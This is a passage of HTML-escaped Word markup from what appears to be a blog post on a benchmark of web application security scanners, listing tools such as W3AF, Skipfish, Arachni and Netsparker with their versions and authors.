dir=&quot;LTR&quot;&gt;&lt;/span&gt; (&lt;b&gt;Lavakumar Kuppan&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;W3AF&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.6&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;revision 5460aa0377&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(&lt;b&gt;The W3AF team&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;arachni&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v&lt;/span&gt;&lt;span dir=&quot;RTL&quot;&gt;&lt;/span&gt;&lt;span dir=&quot;RTL&quot; style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin;&quot;&gt;&lt;span dir=&quot;RTL&quot;&gt;&lt;/span&gt; &lt;/span&gt;&lt;span dir=&quot;RTL&quot; lang=&quot;HE&quot; style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;0.4.6&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;(&lt;b&gt;Tasos
  Laskos&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Skipfish&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v2.10b&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(&lt;b&gt;Google&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WATOBO&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v&lt;/span&gt;&lt;span dir=&quot;RTL&quot;&gt;&lt;/span&gt;&lt;span dir=&quot;RTL&quot; style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin;&quot;&gt;&lt;span dir=&quot;RTL&quot;&gt;&lt;/span&gt; &lt;/span&gt;&lt;span dir=&quot;RTL&quot; lang=&quot;HE&quot; style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;0.9.19&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;(&lt;b&gt;Andreas
  Schmidt&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;VEGA&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.1 beta&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;build 108 (&lt;b&gt;Subgraph&lt;/b&gt;)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Wapiti&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v2.3.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(&lt;b&gt;Nicolas Surribas&lt;/b&gt;)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;XSSer&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.6-1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(&lt;b&gt;OWASP&lt;/b&gt;)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Netsparker Community Edition&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; v&lt;/span&gt;&lt;span dir=&quot;RTL&quot;&gt;&lt;/span&gt;&lt;span dir=&quot;RTL&quot; style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin;&quot;&gt;&lt;span dir=&quot;RTL&quot;&gt;&lt;/span&gt; &lt;/span&gt;&lt;span dir=&quot;RTL&quot; lang=&quot;HE&quot; style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;3.1.6.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;(&lt;b&gt;Netsparker
  Ltd&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;N-Stalker 2012&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  &lt;b&gt;&lt;i&gt;Free Edition&lt;/i&gt;&lt;/b&gt; v&lt;/span&gt;&lt;span dir=&quot;RTL&quot;&gt;&lt;/span&gt;&lt;span dir=&quot;RTL&quot; style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin;&quot;&gt;&lt;span dir=&quot;RTL&quot;&gt;&lt;/span&gt; &lt;/span&gt;&lt;span dir=&quot;RTL&quot; lang=&quot;HE&quot; style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;10.13.11.31&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(&lt;b&gt;N-Stalker&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Syhunt Mini &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;v4.4.3.0
  (&lt;b&gt;Syhunt&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(p.k.a Sandcat Mini)&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;New aspects of the following &lt;b&gt;open source&lt;/b&gt; scanners
were &lt;b&gt;tested&lt;/b&gt; in the benchmark:&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 213.05pt;&quot; valign=&quot;top&quot; width=&quot;284&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Andiparos&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.0.6&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(&lt;b&gt;Compass Security&lt;/b&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 213.05pt;&quot; valign=&quot;top&quot; width=&quot;284&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Paros Proxy&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v3.2.13&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(Milescan&lt;i&gt;)&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The &lt;b&gt;previous&lt;/b&gt; results of the following &lt;b&gt;free&lt;/b&gt;
scanners were &lt;b&gt;included&lt;/b&gt; in the benchmark, since they were not updated
since the previous benchmark (website):&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
